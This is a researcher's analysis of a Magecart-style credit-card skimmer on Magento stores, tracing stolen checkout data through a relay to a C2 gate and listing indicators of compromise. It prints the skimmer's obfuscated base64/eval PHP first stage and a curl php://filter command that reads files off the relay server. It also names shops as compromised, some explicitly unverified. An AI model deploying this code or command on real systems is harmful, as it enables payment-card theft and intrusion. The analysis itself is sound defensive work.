      If you are a credit card holder, this post could be of your interest. Defending our financial assets is always one of the top priorities in the cybersecurity community but, on the other side of the coin, it is one of the most romantic attacks performed by cyber-criminals in order to steal money. Today I’d like to share the analysis of a skimmer implant spotted in the wild. So far I am not sure hundred percent that the discovered implant would be an evolution of Magecart – since the activation scripts are quite different even if they do use Magento core infrastructure. We might be facing a new Magecart version or a new framework as well for my current understanding, notes suggestions are always welcomed.

      Disclaimer

      National law enforcement units have been alerted, few hours are gone after they gave me the authorization to publish this POST. Please if you used your credit card in one of the following eCommerce (IoC section) consider your credit card as a no more private card: call your bank and follows the deactivation steps. Since C2 and Relays are still up and running, in order to avoid replication, the addresses have been obfuscated. I want to thank Daniele B. for giving me the first “wired eCommerce”

      Analysis

      Everything starts from a vulnerable eCommerce web-site. The user don’t feel anything weird since she would normally get items into her web-chart, surfing from page to page watching and selecting items and finally deciding to check them out by register a new account or just as proceed as guest user. However the attacker could abuse the eCommerce vulnerabilities introducing a nasty javascript sending out information (for example: Name, Address, eMail, credit card number, cvv, expiration date, and so on) to another host, belonging to the cyber criminal. The following picture shows the point.

      Fig1: External Connection outside the eCommerce Perimeter

      From Fig1 we see an alien connection (HTTP POST) to an external source: https://*****.]com/js/ar/ar2497.%5Dphp . This POST carries out a quite interesting payload as partially (avoid info_leak) shown in the next code section.

      touch=86f63747d33786f607e237f62656c6164786f6d656e236f6d662e657d6265627d3431343431333831333737383930303136256870713d3236256870723d32303235362366767d3736353626696273747e616d656d3a4f686e6164716e662c6163747e616d656d3259667965627166216464627563737d35452230366f657e6471696e652230377169752233452230313236236964797d364275637e6f6623747164756d3132362a79607d393336353036236f657e6472797d35535620786f6e656d3535393d2233373d283836256d61696c6d3a686f6e6164716e6524303279636b696e236f6d66257167656e647 .....

      The encrypted/encoded data lands to an external gate hosted on *****.]com. This is a slightly difference behavior if compared to the original Magecart which used to send data directly in base64 format. Mykada looks like a legit eCommerce website that could be compromised and used as a relay (one more difference from Magecart). A further investigation on such a rely shows a magento core installation (this is a common indicator to Magecart) which includes the js/index.php (ref: https://github.com/integer-net/GermanStoreConfig/blob/master/src/js/index.php) providing a nice tool to dynamically building-up a composite javascript file for performance boosting and compression rates. By using such a public magento-core functionality and by guessing file paths (looking for known public folders on the host would help you in guessing paths) we might obtain the original malicious back-end file injected from the attacker.

      curl http:]//*****.]com/js/index.php\?f\=php://filter/convert.base64-encode/resource\=/home/****/public_html/js/ar/ar906.php

      The result follows:

      PD9waHAgCmlmKGlzc2V0KCRfR0VUWyd0b3VjaCddKSkKJF9QT1NUWyd0b3VjaCddPSRfR0VUWyd0b3VjaCddOwoKZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgnZU5xTld2dFRFMWY3LzFlMmpETWxnSEYzazAxQTNyd2RMd2hhQk9VaVF1TXdtODBKaVd5eStlNXVnTkRwYUR1b1dLd2RwZDZtdjloUjI2b0Z4UmxrbkU1bkxGcXNVclZlS2xwdC9WZStuK2VjVFVnQ3lvc1Njam5uUFBmUGN6a3hUTjF4cFA1VFp6OS9mdUxUckowYTBsMG1PYTd1cG94MS9STXZqMDgrdU5TNG9XYXphVm54VENxelg5OG9iWmZNbERFbzVhMmNMVEhkTnEwWXE1UDBURnpLWmVLV2VIdFlkNDJrdjJhRE9FZEs1REtHbTdJeVV2L0MxQisvVFYxOGRLdDZYZjhQeDY1ZGZUdjkvZEtNNzlOVW92b0RoNW1KalJzTEpIMGJ4ZXYrcDdNblp2NzQ2OERNaFdvZjJPalViVDJwTkNRTXNKSEdUNTFrRGVwNUVHS1plQ3JSYURNM1oyZWsyS2JPcGxDd1A4NjJ0TWVicXNzUC9xU0U4RDVmNDJlVm9ybjZJSU1NVWxiUHVJNWtKUkoxMG9DZHk3aXB6QURFeG1lNjVOcVdhWUptdWJKS2hDemgrZE55NmhIZHR2VjhkVlgvN0tFTEU1OS9YeFg1YjFXOHVVSHBqY29oZFNBcWg3V3F1cXIrZjJiK2pvN0VZaGZ4YWJuRXZVeFBjdTJEalpRcjJWWnVnSlJjdFZ0dHlNV2JvNG9haW82RXRmaVc2RWhBaVk1b1duUWtwTzNkakVjanFpaGgvRzNZTE9OOWZXOVNibFdUZUJwU2U0YkQyNXZick42OTBaR2dqdDE2SHhiVTcyNklLc0VnM3RQVXFFTG5CQTA4RHc1RWlMMW9RRlhHeDhlWGlQbmRJQnB1MjkrM3QyMFVKSUo0cGJWRmxWQW9sdW5JeDFTY0YzWjM5NHc0UkFsTUJYQXFma1BCcmg1aVZzWkxwUm1rdElDQjdWb1lyOFBkSUtaQkV3cFcwSG1oTGNNREhmS2U3bGE4SDlpOHF6dXF5S0dPSFYyeTFrVzgzRDBmVllQYTdmbW9xb1Rtb2lQMURkZVh1UUpSSFl4RmxiRGEydDAyRk11UU9Qa1lxVm93aHRmaEVTY1dNRnc4VXdLa0FiT3ZlUStwRWlwTGdodTFaV2RvZTB0SFBrNEhrbkJjQVdjdmpEMDY5Q0Fha0lPTHAzN2s5SHFFQ2pnWkNCTEMwakpLcEFLY0JrcGRnUjFRQUxlQ2F1YmFVeEJIK1Q4NjlNdWIwQ3RzWktoUk5ZRFA2K056YjdnRGxMdW5rOVpGNkVsdWtvSXdabGt1K1g4VnpvZ3FBUnhRSDN6OTlaWFR6MytJcXBwR3pJR2VxcEJyd1FCeGI5WEM3VWRUSUtYVDcvUzNLL3lzUFNubDRXcDFvS0c3VW9JeDA1RUd3QVhSMlRFUTRVbzRkaElFQWc4dlIwY2FJR1M5UXFSMjdSYWZIWi82OCs2SlAzLzhkd1gvbmNSOVhlRlBuakdtNjhsazB1Ty8vL2wzYzlGQUlEZzUvcHBPNitwcENPblFYRzludmRKS3h0dzA4UEUyOHN0c0xFMm1IS0xuMERFWkxqN1FaZTRlYU92RVN6aE5XRzdQNDAwVkQ2SGdmdTVaOE95ZEtYd1VDbi9jU1IrMVFBMHFkeE03bHEvUHczazFtQ0xZUlB2aStBMDJrZVhvUlNjQ0tFakJReUZWdjhQc1N6Y0VXMGZGc25CREswNVhONVdvOXNGWEwwN0JOV0RCaG9iVkRKZ21mSEdzTkpOY1MzZGNqcHNNV2tZOEEyd0VlZ0tRL1ZJcmZkTCtJZjRPTWtlSzVWeVg0UlBUbEZJWnNjcXdvVVcvdEJNd1NBb2tiU0NZNUpDSEp0d1NSdzlNL1hvR1lLS0NKZkFmRDZ5d05ia1NCeFN5OVVjNFIyOXVHSTF6aVFwNE5IYnZLWTVRdnZ1T3JCTEw3SEVocDBJbUNPVzUxZTdmT3ZQN1NSd2UvM1Z1RllHemNCOGhjRXpQNEo5RHpQYnRUUTZUQ25jVEhjN3B6T3M1QkxGTVVVVmthTUZPd2dQaFVSZFBqOFBkZ3RFUlBYUUJsQkxrSnRkb1hTL0JTcC9xS2Y5bmVHTDk5M08zVi9Ib09tbVluRm0zR1JkNXdNcGtkQW5wYWpqbEppRzc1VEFTdmkvTjBSS0dOUVJlcVhDU2tFWUM5eWdtUno4VlVScFFBOGNYNXFlUG5iOURQRkJvTjI4YmpUY1Q0TmJIQ051MGd1NStQVXlvQkw2MVMyL3ZVSVN2ME5BQWN5VW9KOHYwVE02RjNYZUpKMUxDdHRKZ2pOUm1tbG5kSGlTOTlmWjBEQnJwUGFQR2NLUkFnWUlQTGgrZW5Mb3cvK2dHQnhDRTVBb05lTWVTa0wycUNlRmt0cHVPOENCZFVTN2NnMmlCY3dzblBaRUNnUTc0dGh3WDNxOFY0S1AvMm0vMy83MDQrVEtxaHJUenRKU2xzU3c0VEI5OWpqZVZHMWNQaXhPUWcrQ0hEWlNNS0Iwd0FRNGNwQUtCd093LzkwZzFNVnByRU9EV0QxR1dTSGR6aHM2L2hNcVV4Vm51Q2oxS1V1OFo1dS9mbkh0ODdjYzMvTzNPYlIzZDNkc2E5blRMZXpyM3l0dGF5RmJkV3JkUVNRTmNKUlo2eVQwS1hnLzVBbU40VUZkby8yT1drWnJ0VkNMQjh0SU8yMDhwbG40OFVPb0NTMnlQQ3ljTFVRb1EvdjRqV0lzZC9BY3dIWGgxWVlXZWUwcTl6TlhOUVNvYzlKaVY0OEhWMFV5cHplM3RNU2xUOCtpNWV3Q015Y1RjeWNjOHduWXJoRTA5OU9IRUlsUVVqcXJod0pXdnI2eU1yUS9Ua3BObEdiY09ZYlkvbDg3Q240Y3p3QWZYNG80RHY0RlVCQ05PMnVLVlMwSjNrUzJveWtuYTFqQUtDR1BRa2NBdnJUWjAxeEU0b3NLYnlVSDZDcG1EMjIxRVN4eUQ1UEVYQjhtTi83MUVyTFlTU0lvSS9lZmdyVCtlUXQrQlpldnp5aUZrOE96ZkxLcVFrTlpIK1JqYjVMVE9hNDVpMkpTbVdDTDI0TzRGRGx5cUdweUh3OGhldElmaXBMb0Fsc3NFeWthdWo3Q2REblI2a2V6QmRvd1RScG5nOW5uNTZNSENPWlFKSVhnbnBhb2crZm1yR2U1RHpRME9wZUxtUFhuUE5hY0p0N0ZJdS80UVVCU2lSZHNwUjBjSzdrK3U5QWlNZ1drOS9PaklDdnQzSlZPT2hQK09tOHVtZU1ic1RadE9qS0xJRkx4bWllMVl6N1pzYkpOZzd3MmgxaXNxcS9DclBiejhKeGVWZGpYVEZ1Z3JPeHB2MldHS2xJWGlBR1laOGJRRWRrTVVSaFNPZDYvZkVrcnlGQTkxQitnSTJqZWFIWTRGMm1TQ1M3VmhrTjd4ZFBQdG8vSEYrL0JscFdDMk5OY3ZZWnJIOHlncE4wL09FSTVucWFnTFFMdEJwT2JkQlZOTi9nRTJBbytCMEtFaUF5YXZlRWlBMGV4K2ZXK0h3Q28xRktKTUVmdCtDYTdDWVd0bGplQmFHU1p0c2N3NG5ySWhKbTNLT2FpK3BZSFVFUEpnMmt1ZU1jYnNvbktiemFKblpmZkhBcFNaY3ZFV1VkR0NXYVJ0MVJ3ayt2UGZnTHBlVDBubStZM2JLOVVzRjZxQ0VjSTB3QklBY0FqVkJnRzZaLy9udjV5QXZoUFRFeThnYzNoMmdxc054UUVTZ0w1VjVpbzlkK1g0RlhoSWVPWWhSUFgwcXFnRUpjUlowcXVTU0hFelkvZklLUmRmSCtHVldwcmtDQmVxcUJkUDV1OHRQS0lQdWdkcFl4dVY0SlRmTzdhUlNBQzJZS2lKbmdjYlJOVjErZFE5RUF6KzloZnQwVnM2Wk9Td1lQM09VR3UrZ1NCTUM4ZE5nME95WXFUYlNFQlJzdU5rcFZXTko2bnMxVFJDNFFEWDNSQnJHZVFISDVwRi9JVy9nTmo2d3ExSjNyT2t0MUhKcERSblIvZUtLamNZeXU5YVR1YVVKTzljaERlSDVwWUkzZTUvNlFWVHVhbDdkRXJDUFRaelhKT1ZHSjZRc3AxRGkwaHlhTk0rUTR1WWNoem1scC9RNjFXUWhOWm9LWGUxZDNaOUlscFp0STdGWHBQcmVqYXF5aHB2dW56N2ZMNk5MVTJidGpiWjFhc3NwdjdyNTR0VlBsOWprdWxibXpwV1hmT0VkMEMwQnVldzFkZmNoYS9KbFBwdlUxWStQbmNVVGlHTFBYcDg5WE1KZ3M0Q3F3TFVZZHlsOXNKWDJmWnVTQTFrTEp2VmJGanVOOStjT0hqMGM0Zy91M1QyOXU5ZitqNWQxLy96ekpNakUzOHZYbDY0R25rSEZjU2Zlbk5wL3V4WGFETjhqUW5MeHY2bHQxL2R1M3htNmQ3dnM1RnFPUnlxWFM4cklSVVBzcUpXWkI3VUo0WmxvYTdqTmpNb1dCM2trR0VkNlVTS3BkRDhJKy9raDNscnZsNmlJOEloWDhVWW9ZZngyZ2NDSkhVYm1jcmhxY3BPeGRseUNuTnlHZGdjaDVReTl4K255MjVsbVdXQmNYQ0Vmc3FYMVViV3kxb2w1OExsakh5TTJmQXlTS2lGNVEwMVcxTzJtLzhZdlR3S2dqcXF0WkZKTXg4aUx6TFUyeEFrWnNYelV1TjZueEFHNXFtRlJFSEZoNzcrcDIvL1B2ckY5OGNpbmQyYndWYVJwN3BTVHVxZ2dFQ29qRXhQMGlwVUNSOTVLZ3FFZlkzcitoZCtQM0hwOVdURXliMzd1TnBxNk1kbnQrZmF0bGJML2tEWlQyM2xHNVVsQXdCMXdIS2xtR2xCMlVrOVpVTmVNOGNrbG1jTzFSSERsajBvb1ZxQkhVM0xoWW9xRC9TUk5Gb0lHZ2lxbkcrTjJGNTJPUCs3UEc1TTlLVlRWVDUvUVV4L1VYK05MQk9IRXhZbU9OMGRyZkVtdzRxejZ0S2pnUVBMVHYvZzV1M3BveGZLdlA3eHRTT3pCeVlqYkdSWHE3VzFhZFdZUkNTR2JqK2lPb1o2M3dlVXNxaVFxL0xWTFh0VFdmaUlnVTJsNzI2QzhyWkRmVU5VVmFFNGg2dWtrSlgyV3pFcHpreGtLcHZLUGdnazdkS3p1clREU21ZK2RLaHpTK2VsWm1ZUjF0blV0YTJNdS9WeVVBM1cwZ1BSTFBHWVh0U1RqcFdqYW82TjVQMVV4Y1VRUGxSbUR1c1oza1BnZk5Fd0dEQ2gxMHNhdXUydmpKOXlXWGJxaUFhUlZTMXN0N2tvZmtFdmFlVVEyZ2ExbmJsc21Td1VxN3lYMVRPU1pjZVpYYlBCU2ZXeDltM1ZCVHVRSWt1Y3RyWk1taFk5cVg4Z3RYOWNzNEdDYU82blArNWRHWHNjWVh0M21lMWIyYXFXTzNieWFzbTBnZXdseUh4U1NtV2ZyeEdKb2pQVjE4UVo4YzcxL2FjUU1aazRJaVpVK2hPdXJYeWpuRThnZ1BVQjRpYnVUZjh5RWh0eGJYMTkwOTZ1amsyU3Fkc0Q2TjFTbzZNNktuQzA4M0U3bGMyUzdYbGY2ZWc1Zy9sNUVKWFRRQUl5TEJvcTVsaWpHRjJXT3QwblJjNC84Ump2SnNacjVVb0FOYzA2S1pHeUhWN0I1eEc3WkMxSHo5ZEpWWnh4bXVDSWNyVEVkSFZTRXJWL1dzK1RCek16UzM1U1JTdFpSaHpEVVUrTW1CZzFHRVpLTngweDRlV0x1TXR4VW1reExJV2JjUmZ3UzUwV255TncvNUQycm04bDlmaEZUK1JhWERHT0pHYkUzR2tKZ3N2aGQ3dHdadFI5ZGg2OFp3WUFUM29zL3dIOFpOKytTTGZkR21kR080ZUZNZzExSURBSURGV3R0dmhRZ1h5TzBJVmVDTkE4SjQ1MUtBZkswYWZVRktXSWMvalMxTk94ejUrZmVnbnExNzVaUFBQaytzU1hKMytDSTA1K2Yrem8yMnZQM2k3OFFpaDA2OGJGaFgvbkQzcklVY1RxZUhXd0lWelArU3FSdHp1ZDl2djl2Y3dCTTk3bmxYL0wxbmR5NVgySXpCRWppQ0ZQSXlzSkQwVFNCTDRnWmgwbVphemhqNlF0T2oybFBqRko0YTBEOUJuSWNWTlNFNWpLRE9KVFdKdFB2WFdLOTJHWWtRRERWMW1zTmRNQUVKa2ZubDNjUUcwdEhERGhNcmhGR3Q3c29rUUhGNmdOQmtzY2hwTkFaQXpSMEV2NEMyY1NaRnc3eHpiVTFOUmtpVlA4M1ZEbjJiTWJDbE9DdGZ3LzUyVlpDU1NQYnFZdGgyaG5VaWc4NGlMY0lIeFJBcWtsWjl0NW9CWmNKd0gvWmQ3QjdkM0lta3FndHZCL2haeUVlNFpPMlQvSlQ2REJwOUN2eDI1ZFNmcFZOVlh6YXl2YmNvc2pQZW9mc2dPTmwzSURTVmhZTEMvL3d4a29VY0NxV1V0VlFvV1pxcTlBbnpTa3lYSkRMVDNnbE5VMlB2OXU3ZzJOVXlscGE1cjZEbGRDZElMYmhBMUVRblFpYVlGcEt0eFFrOGhBSFZVSkJzdEZiSUZROFZTY3gvRWdlVnJOaHNoL2wzWFR3WUZXYVZpaEdWcE1RK3VjeUZ1ZW1wbHVVL1l5dUxONkxIbXB6RE1uOGJwZE1tbFNscWNMRlh3czNHdFlOd2Z4d2tIUlNBa3htM05Md29GUFE2ekN0TlJLSkJqOFQ0K1pISkZYY3JmSkc5cllURWUxQjBlbDZqU2pPMjVlWU5CSDNMS29jSk9vbjNpaEs4aFlReXhUUExCRXY1WmxKY1VnblZoelhKYmxkUlVTODdKa0loSzVQNXZTTUJQallDcW5BWnE2blNhMUlPOFNkWThDN0N5SHdqSVZybkpGT2xpMkovcGxNU2NXMVFBTmU2dzBiQVFuVUZWTmxMQnFlVXp4dTZVNnpzcXdyWXNVUm9BeXpGQUEyN3pzRUtxblJxc0UwdVJhL3Q5WEo2T1hWQ3JORFFQRGwxQklaZ1lnSy9xOGxGTmlJRktMbFdVZW05YUlkNGM0bXNxU080b0x1RUpjaThva2lSVithWlBEeDhvWmhqenNNcjRiUVlyRVpTUVpRNkRUbE4zU2FSQW1NY054ZFNQdmw3cXdLSjF6dUNaRThiTGQxYzBVVmlGSE96cVNPRlhqL0VaTk5BRGNScFMrS1h0U3lqQlNnQ3dUQ0dOWlBESHhBc3lrVEpxSGdIcWN5RGtNV1QzdWNCYjVZSjFSaFZocUJXS09qYVJjUG9FRE1mN2hjdVQ1T2ZaU3Z4VFFLdm9GYjB5WHlCbURQTnlLSlExUWlNQmsrUmZHQ0dqVXZhRzRqZnlYZzkrS1NqTExiT1JBbHhHME1RZ0pyM1JxYXR3Qy9vSTNvRnRRcm5EcGJUVTFnNVNvWkErMnZLN0xJL0h1UG90SzJaMVdPcDNmQ1VVNkRqbHJ6b2FoU0VlODF4dGlDRFlLVFJwUW80SXJ5NmtiaXpuMWt5SzhBTU1WZjFpckxYbXNZSUFVeGt1MkFSMjFTWVk3ZElZTFNZbWY3L0R0aTVSVkQxb2xseUlvcURUbUpsKytLQkUxSGU5OENxekpha0NUd3hSaFliVWlNdHR5dEYyaTJvSlBzQ2c3V0NRL0hCWnd5T3NTUUFNWkh2RVpDcTVNU0RFVUtBUTBOdUVTMnVVaDVyZ0MxMnc5VGhuUTRSd0Z0V0FndUM5U3FyMWllVGx4OU1xUmJ5SUdTcWorVkZ1cXE2eUc4VFVhNkxqNm5TWVVhVzYvYm5lZ2NQRjIxQlVsSkdHbjd2N3k3OWpYRVNPSDFXeWthVXRobGE5WU9va1ZzSGMxejJob21UK3IxR3JLRVJlTEtiTEV1djdwRjk4ZS92VmhwTkRRRmFjWjd4cm0wQWlXbW9ENGkxTzN6MFZINGdZZjZGRGQvMEhoTU45R2lyR2k2SmZIYjAwdG5mbzZVdmg0MVZPUDBqU1Nia1dWTXpkK2ZZWXpzZkh3d1ZzSHh4N2ZPWEgwMi9mdkhidjNkT2E3cUJwVXhMYmY3aThjbjMvL2p1ZDA1WExyRE1qVmk2c3pHaGlLM1NmL1B2dm03d2N2SngrODl3UngyUnRUWHRQRzhidGk2NVdsbTRmdkg1cSs5SDdhRjArUC84VG40U042Z0NaN2I2N1I3cFZPTjZ6VGxTUDNNdGRLNnk1OUtVSjhyV05kL3c4L3Z6ait3OHloOTdQSTU5T3gyRGdSbTd1OWtraDV4cVZ1bVpjaHpFbEtXZHVLQTN5NWc4d2RPbjEyN3RuN1pUcnpqR3FraFhuSXhQQXNDSkx5SFVHeDNQbTI4eUVWTDMwcG9vRjdGTlIxMUZUbmRPUTZBMGxuZTl1ZTl0WTkyOXVhUzNDSlNzb3R1bWgrZU51VDRpT1NsRXVqUzRwbTNwWUxJUVRibC82NGR2bUhIOGF1Ly9SK3pzVU40YVZMYis4c0NTTSttNXUrOFdqcTZ0djNiL3M4T2hKT1RFNWRpQVprQklQQjZLNWsvcVNRdUJoNjYvcS9tUDdwMm92bjd6L3FQZzBjY1U1NDh0d0N2enZrYkJ5OU9IWDc3STFiYXpvaDNRZEM2OEZKdUhFOVhZeWNGL3N2SG52NTZ2VC80Qi8xeWd4ZEdmSTlYeDQ5Zm01eC9QM2N2cVpwdEhZdnFzcWhDYkhyd2FYeE4rZmZ2K244eSs4V1o4WHE2OCttRDVCdU81czY5alIxckxxYWJobWpxaWEvOGJhOGVEbjU1SmU1eDQrTHc2RGx0MWJkLzgzTmwrTjA3Ymc0OWdBSFJFcHhaSzJ0ZEQxeDllQS8zNzY2SUhaNjBMWFd0dWQzRC96KzRPUmp1alFWK3dwSXNNWkdNdURFNHBHZjZYcVI3K1BRNVY5MS9qTDE0dURTdjVmNDlLNElVV3NkRHd2L2MvQVdzQzc0ZE9Ld29PQWh4Ly9BbUhjRCtNMzhTN0ZUNE1DS0w2TzVWczVJOHJnczFQcG9GRnlBUjUwWHJBNnY3Nmc1UkZtckE4QVF5cDFJRUdhZVE5bWFiSWpid3h0ams2OW15a1R3djBQaTZYT0hyajljNElyeVdGN0Rlb3VQWnVrMmtjTDRpS0RBWFhxdGJXL0dYejJoRzBPb1Y3djhwOWhZQkowVmF1S0RkYTRlK2k0SjNmeldGZW9aR2gweDZnUFRLTmVBajNUUkJtQWNzSFcwVm12cXFQLzB4Q3hkUFhMNkhtcXM3ZVlOTVlGYTlmV0xsQXJQaWUwQ3JsYUFkak54Z2dLWk9kUXdJbDJZS01UNW9KaFhVMzQrRFMzRGRZN0lOTzhROHhFemxSRXlHUWhoeXhVZHdHak9NSkkwUUZoYlJISERDVWJEMDRMUkFraFhxQmxPVmp5VjAyS093NXppSkpaSXIwM3M1c25YNUhCTFJ3OElXaHhKS3dodDFkTVozaGQ2VldCcUlPbDYwejRxY2FuR2FtbnZXcHZXL0RjbmY3eExkNkdja3NCZk10Nk5INStjdm5veXNsbDM2SnVVckcyTHRaVlY3M2VzdHY2bU5vT2VMNS9yODVWc1FHSEkyb3gyc1VDOFJ4OHYxNk9SMWFzaE5heWQrSHA2QXFnWm9zdkQyUWtlUHQ0Sjd3bzB4S1dtSHI4eVIxODdlZmdFTzBDOXFZMS82ZFBEZWQrcVVEWXpSdGxPM0x3aWo0UTVyZmZrQStKS1hNWWlIWlNNQVZkZlc4OHVuN3FIK2s3Vy91Smo2cEpPWm9WajgzYVBHVWxMV24zc0kydmk3dlhMQldoSW1RU2pPOTErZXhOZC9LRHRXUytIZytqMVFrRTVyRlJjOU93VThaSEtPdkI5eDBXVFRaVUpiMnF0aENzWmRyNTRRMkNpci9EVEJqRkhjVVJnMFJTUG1RenJkR3EzY3huMHNrNVNUTFhzdFBoV2lac3lCdk0wdHpGVENaT1BNNmljb3VPb2xTRytna0c1VXVUbFRoYk5wT2dGOEpEVzQyWXE1b2daQzNvaFY1ZlE4QmNQVXBSUXhVVmVMM1Ztd3pTcDNvNDRGeFdreHlTaldVVXBXM1Y4dk1MYkp6R3NwZ0d3TjlIT1pZdGZxS01yTUwvVWhwWitlVGpsTU9obWMwME5MM3Ryb1hSWmxlV3c3MTBlU1FWOTRPS0x1YVhmNy9QcjhpcGZZMGtuMHZqL2ZlODJwdz09JykpKTs=

      We are now facing an initial stage of obfuscated .php code. The following image (Fig2) shows how the attacker obfuscated the first stage. You might appreciate the activation variable “touch” which would activate the process in both flavors: GET and POST. Once the activation variable is found a compressed and encoded payload is fitted into a multiple variable concatenation chain and later executed (eval).

      Fig2: Payload Stage 1

      By following the reverse obfuscation order chain we will end-up in having the following code (Fig3). This time the attacker used more obfuscation techniques: from charset differentiation, junk code to spear random comments making quite hard the overall reading. But taking my time, ordering every single line, substituting variables and encoding with my favorite charset I was able to extract the decoding loop and to quickly understand the Payload behavior

      Fig3: Payload Stage 3

      Indeed, once the script decodes the received payload (by rotating on charsets with hard-coded strings) from the compromised eCommerce (Fig3 decodes touch variable content), every stolen field is ordered into a crafted object and is sent to one more external host: https:]//^^^^^.]su/gate/proxy. The following code section would help us to understand the execution chain.

      REMOTE_ADDRContent-Type: text/html; charset=utf-8Access-Control-Allow-Methods: POST, GET, OPTIONSAccess-Control-Allow-Credentials: trueAccess-Control-Allow-Origin: *%&=Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20120101 Firefox/32.0touchhostnumberexp1exp2cvvfirstnamelastnameaddresscitystatezipcountryphoneemailHTTP_USER_AGENTNumberDomainCVVDate/billing:firstnamebilling:lastnameHolder billing:emailbilling:street1billing:postcodebilling:region_idbilling:citybilling:country_idbilling:telephonehash=&ua=&ip=https:]//^^^^^^^.]su/gate/proxyvar js_ar=;
      

      We actually have one more host that need to be analyzed. By taking a closer look to the used domain, we might agree that it looks like the ending proxy gate which stores data on a given database (mongodb). Again by enumerating and seeking inside its public information it was actually possible to spot and to enumerate the used technology to store the new malicious implant (docker compose to build up the infrastructure). By spotting a temporary directory – used to store temporary files between the attacker infrastructure – I was able to build up a simple monitoring script which revealed the most used compromised eCommerce.

      Attack Magnitude

      From the command and control host we might observe what is actually passing through it, but we might have no idea about the overall magnitude of the infection chain since many eCommerces could have a low selling rate (rate of customers during my monitoring phase). In this case even if they are compromised, it is very hard to discover every compromised eCommerce by using this technique: looking, converting and importing temporary files generated every time a data leak happens (every time a user adds his credit card). So we might ending up with another method. Fortunately the host reserved a PTR (Pointer Record) to mo-------.]fvds].ru as shown on Fig4.

      Fig4: PTR on ^^^^^^.su

      The new host (mo-------) definitely recall the mag^^^^^^.]su registered email address (mo------@protonmail.]com) in an unique way. BTW It is active since 2019-07!!

      Fig5: registered eMail Address

      According to URLSCAN, using the PTR record in order to understand how many known websites have links pointing to mo-----.]fvds.]ru, you might find something quite worrying (as shown in Fig6): more than 1400 potentially infected eCommerce. Now, I am not saying that every single eCommerce in the list has been compromised, but taking randomly 3 of them (and reported in IoC section) I found the exact infection chain on each one. So potentially every eCommerce on that list (so that points to the command and control) should be checked.

      Fig6: Link on m——–fvds.]ru

      According to urlscan.io most of the websites pointing to momo--------s.]ru respect the following geographic distribution (Fig7). Most of all are US based followed by RU, NL and IN. While it’s hard to say that it is a targeted attack against US eCommerce websites, stats (Fig7) are surprisingly talkative.

      Fig7: Location of Possible Compromised eCommerce

      IoC

      The following IoC have been extracted from Command and Control as described in the Analysis section. I do have evidences that those eCommerce send credit card numbers to magesouce but I did not analysed every single eCommerce outside the “High Confidentially”, which could be compromised using different infection chains. More potentially compromised eCommerce site could be found, a nice unverified list (“Low Confidentially”) follows.

      High Confidentiality Compromised :

      – (POST): https://*****/js/ar/ar2497.php
      – Sha256 (ar2497.php): 7a04ef8eba6e72e3e21ba9da5e1ac99e4f9022fae19dc9c794d87e4aadba1db4
      – mom*****@protonmail.]com (email used to register c2)
      – ——.]com (rely)
      https://^^^^^^^^^.]su/gate/proxy (c2)
      – mom*****.]fvds].ru (PTR)
      http://www.]startinglineproducts.]com
      – shop.sobelathome.]com
      – shop.princessluxurybed.]com
      http://www.nclhome.]com
      http://www.shoprednose.]com.]au
      http://www.plusmedical.]com.]au
      http://www.selariadias.]com.]br
      – owners.clubwyndhamstore.]com
      http://www.assokappa.]it
      http://www.shogunlivraria.]com.]br
      http://www.broadtickets.]com
      http://www.broadticket.]com
      http://www.siamflorist.]com
      http://www.castmemberlinen.]com
      – bumperworksonline.]com
      http://www.stixx.]com.]br
      http://www.worldmarkbywyndhamstore.]com
      – tknwthunderdome.]com
      http://www.silknaturals.]com

      Low Confidentiality Compromised (more investigation is needed):
      URL: https://mo—&#8212;.]fvds.]ru/
      URL: http://hotelcathedrale.]be/
      URL: https://mag^^^^^^^^.]su/
      URL: http://www.]americanlighter.]com/
      URL: http://www.]turyagatea.]com/
      URL: http://www.]dysin.]com/
      URL: http://hotelcathedrale.]be/
      URL: https://magesource.]su/
      URL: http://demolicaomoveis.]com.]br/
      URL: http://www.]zamarimarcondes.]com.]br/
      URL: https://www.]chirobuddy.]net/
      URL: http://hotelcathedrale.]be/
      URL: http://flagandsymbol.]com/
      URL: http://english-furniture.]co.]uk/
      URL: https://shop.]horoskoper.]net/
      URL: https://myphonetics.]com/
      URL: https://magesource.]su/saturn/login
      URL: http://hotelcathedrale.]be/
      URL: http://www.]almosauto.]in/
      URL: http://chappalwalla.]com/
      URL: http://store.]uggtasman.]com.]au/
      URL: http://www.]vintageindiarishikesh.]com/
      URL: http://www.]matexbuyer.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]doreall.]com/
      URL: https://prawnman.]com.]au/
      URL: http://www.]autocleaningbrunssum.]nl/
      URL: https://www.]paudicesrl.]it/
      URL: http://www.]pejenterprisesinc.]com/
      URL: http://luxuryjewelleryto.]com/
      URL: http://okj.]in/
      URL: http://hotelcathedrale.]be/
      URL: http://aquasport.]sigmacell.]in/
      URL: https://www.]xinginroo.]com/
      URL: http://dhyanaa.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://hotelcathedrale.]be/
      URL: http://hotelcathedrale.]be/
      URL: https://www.]arenaflorist.]com/
      URL: https://prawnman.]com.]au/
      URL: http://www.]officecorrect.]com/36-6.%5Dhtml
      URL: http://hotelcathedrale.]be/
      URL: https://medik8.]bg/
      URL: https://www.]denimvenim.]com/
      URL: http://flagandsymbol.]com/
      URL: https://www.]theaugustco.]com/
      URL: http://www.]sportlowcost.]it/
      URL: https://www.]sunrisewholesaleinc.]com/
      URL: http://www.]fashionaxe.]com/
      URL: https://shop.]horoskoper.]net/
      URL: http://chappalwalla.]com/
      URL: https://gorusticx.]com/
      URL: http://www.]vintageindiarishikesh.]com/
      URL: http://www.]tribalasia.]com.]my/
      URL: http://hotelcathedrale.]be/
      URL: https://magesource.]su/mage.%5Djs
      URL: https://magesource.]su/
      URL: https://magesource.]su/
      URL: https://magesource.]su/
      URL: https://magesource.]su/
      URL: http://yugen-studio.]com/
      URL: https://www.]prostraps.]com/
      URL: http://fetchscripts.]com/
      URL: http://de-lices.]ru/
      URL: http://www.]doreall.]com/
      URL: https://kolcraft-staging.]gianthatworks.]com/
      URL: https://magesource.]su/
      URL: https://magesource.]su/
      URL: http://aquasport.]sigmacell.]in/
      URL: http://www.]americanlighter.]com/
      URL: http://oomph.]com.]sg/
      URL: https://magesource.]su/
      URL: http://pharmatrades.]com/
      URL: http://www.]onirico.]it/
      URL: http://luxuryjewelleryto.]com/
      URL: https://commercialpoolandspasupplies.]com/
      URL: http://montecitocaviar.]com/
